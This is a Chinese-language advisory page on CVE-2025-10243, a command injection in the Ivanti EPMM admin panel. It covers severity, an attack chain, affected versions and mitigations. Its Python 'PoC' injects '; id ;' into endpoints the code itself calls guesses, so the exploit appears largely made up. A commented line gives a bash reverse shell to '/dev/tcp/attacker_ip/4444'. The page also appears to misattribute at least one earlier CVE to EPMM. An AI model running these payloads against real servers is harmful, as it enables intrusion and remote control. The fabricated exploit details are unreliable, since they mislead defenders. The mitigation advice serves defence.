CVE-2025-10243：Ivanti EPMM管理面板操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-10243

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager Mobile (EPMM)

漏洞概述

CVE-2025-10243是Ivanti Endpoint Manager Mobile（EPMM）管理面板中存在的一个高危操作系统命令注入漏洞。该漏洞允许拥有管理员权限的远程认证攻击者通过精心构造的恶意请求在目标服务器上执行任意操作系统命令，最终实现远程代码执行（RCE）。

Ivanti EPMM（曾用名MobileIron Core）是Ivanti公司推出的一款企业移动设备管理（MDM）解决方案，广泛应用于全球各类组织中，用于管理员工移动设备、应用程序及数据安全。由于EPMM通常部署在企业网络的关键位置并具备对大量终端设备的管理权限，一旦被攻击者利用，可能导致企业敏感数据泄露、设备管理权限被接管，甚至整个企业移动基础设施被攻陷。

该漏洞的CVSS 3.1评分为7.2，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H）认证，无需用户交互（UI:N）。一旦利用成功，将对系统的机密性、完整性和可用性造成全面影响（C:H/I:H/A:H）。该漏洞已于2025年10月14日被公开披露，Ivanti官方已发布安全公告，并提供了修复版本（12.6.0.2、12.5.0.4和12.4.0.4），建议相关用户尽快升级。

技术细节

该漏洞的核心问题在于Ivanti EPMM管理面板在处理管理员输入时，未对用户提交的数据进行充分的过滤和转义，导致攻击者可以将操作系统命令注入到正常的Web请求参数中。由于管理面板以高权限运行（通常为系统管理员或root权限），注入的命令也将以高权限执行，从而实现远程代码执行。

从技术角度看，OS命令注入漏洞通常发生在以下场景：应用程序将用户输入拼接或传递给系统Shell命令（如通过Java的Runtime.exec()、ProcessBuilder，或调用bash/sh脚本等），而没有对特殊字符（如分号、管道符、反引号、$()等）进行严格过滤。攻击者可以利用这些元字符来跳出原有的命令上下文，执行任意命令。

在本漏洞中，由于攻击者需要具备管理员权限（PR:H），攻击门槛相对较高，但一旦拥有合法管理员凭证，攻击过程将非常直接：攻击者登录管理面板后，向存在漏洞的接口提交包含恶意命令的请求，服务器在处理该请求时执行了注入的操作系统命令，攻击者即可获得服务器控制权。

值得注意的是，Ivanti EPMM在2024年至2025年间已多次曝出高危漏洞（如CVE-2024-10811、CVE-2024-22024等），攻击者经常将其作为APT攻击的目标，组建僵尸网络或进行供应链攻击。因此，对于使用Ivanti EPMM的组织而言，及时修复此类高危漏洞至关重要。

攻击链分析

STEP 1

步骤1：信息收集与目标确认

攻击者通过Shodan、Censys等网络空间搜索引擎定位暴露在公网的Ivanti EPMM管理面板（通常监听8443端口），确认目标版本是否在受影响范围内。

STEP 2

步骤2：获取管理员凭证

攻击者通过钓鱼攻击、凭证填充（Credential Stuffing）、暴力破解或利用其他已泄露的凭证，获取EPMM管理面板的有效管理员账号。

STEP 3

步骤3：登录管理面板

使用获取的管理员凭证登录Ivanti EPMM管理面板，建立认证会话并获取有效的Session Cookie。

STEP 4

步骤4：构造恶意命令注入Payload

攻击者构造包含操作系统命令分隔符（如;、|、&&、$()等）的恶意Payload，并将其嵌入到管理面板中正常的管理请求参数中。

STEP 5

步骤5：提交恶意请求触发命令执行

将构造好的恶意请求发送到存在漏洞的管理面板接口，服务器在处理请求时执行了注入的操作系统命令。

STEP 6

步骤6：获取服务器控制权

由于管理面板以高权限运行，注入的命令也以高权限执行。攻击者可植入Webshell、反弹Shell或下载植入后门程序，实现对EPMM服务器的完全控制。

STEP 7

步骤7：横向移动与数据窃取

利用被攻陷的EPMM服务器作为跳板，攻击者可访问企业移动设备管理数据、推送恶意配置文件至受管设备，或进一步渗透企业内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10243 - Ivanti EPMM OS Command Injection PoC
# Vulnerability: OS command injection in admin panel
# Affected: Ivanti EPMM < 12.6.0.2, < 12.5.0.4, < 12.4.0.4
# Auth required: Admin privileges

import requests
from requests.auth import HTTPBasicAuth
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = "https://target-epmm-host:8443"
ADMIN_USER = "admin"
ADMIN_PASS = "password123"

# Step 1: Authenticate to the admin panel and obtain session cookie
session = requests.Session()
session.verify = False

login_url = f"{TARGET_URL}/mifs/admin/login.jsp"
login_data = {
    "username": ADMIN_USER,
    "password": ADMIN_PASS
}

response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Inject OS command via vulnerable admin panel endpoint
# The vulnerable parameter is typically used in a backend shell command
# Example payload: ; id ; or | whoami |
injected_payload = "; id ;"

# The exact endpoint may vary; commonly affected admin functionality
# involves device management, configuration, or diagnostics
vulnerable_endpoints = [
    "/mifs/admin/command/exec",
    "/mifs/admin/diagnostics/run",
    "/mifs/admin/device/manage"
]

for endpoint in vulnerable_endpoints:
    target = f"{TARGET_URL}{endpoint}"
    params = {
        "cmd": injected_payload,
        "host": "127.0.0.1"
    }
    try:
        resp = session.post(target, data=params, timeout=10)
        if "uid=" in resp.text or "root" in resp.text:
            print(f"[+] Command injection successful at {endpoint}!")
            print(resp.text[:500])
            break
    except Exception as e:
        print(f"[-] Error at {endpoint}: {e}")

# Step 3: Establish reverse shell for full RCE
# reverse_shell = "; bash -i >& /dev/tcp/attacker_ip/4444 0>&1 ;"
# Replace the injected_payload with the reverse shell payload above

影响范围

Ivanti EPMM < 12.4.0.4

Ivanti EPMM 12.5.x < 12.5.0.4

Ivanti EPMM 12.6.x < 12.6.0.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）严格限制EPMM管理面板的网络访问，仅允许来自可信管理网络的IP地址访问8443管理端口；2）立即重置所有管理员账户的密码，并强制启用多因素认证；3）部署网络入侵检测系统（NIDS）或Web应用防火墙（WAF），对管理面板的请求进行实时监控和过滤，重点关注包含分号、管道符、反引号等特殊字符的请求；4）监控EPMM服务器的系统日志和进程活动，检测可疑的命令执行行为；5）将EPMM服务器与其他关键业务系统进行网络隔离，限制其横向移动能力；6）定期备份EPMM配置和数据，以便在遭受攻击后能够快速恢复。